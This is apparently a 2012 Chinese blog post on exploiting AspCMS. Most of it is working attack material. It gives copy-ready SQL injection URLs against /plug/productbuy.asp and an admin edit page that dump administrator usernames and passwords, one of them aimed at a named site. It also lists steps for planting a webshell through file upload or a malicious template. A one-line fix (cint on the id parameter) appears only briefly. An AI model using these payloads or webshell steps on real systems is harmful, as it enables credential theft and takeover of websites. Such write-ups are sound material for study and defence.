aspcms注入 cookies欺骗及修复

漏洞出现在
/plug/productbuy.asp
对接收的参数id没有进行过滤而导致的注入漏洞
注入后的页面有跳转,所以要快,建议用快捷键复制
爆用户名
/plug/productbuy.asp?id=2 union select 1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37 from AspCms_User where userid=1
这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4………..
爆密码
/plug/productbuy.asp?id=2 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37 from AspCms_User where userid=1
后台登录地址:/admin/login.asp
后台拿shell
1、直接上传.asp;x
2、系统配置信息
3、模版管理新建1.asp模板,内容写马的内容.
修复方法:
id用cint(request(“id”))

问题二:
————————后台注射————————

http://www.hackqing.com/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1

posted on 2012-10-13 21:54  =_=!  阅读(640)  评论(0编辑  收藏  举报

导航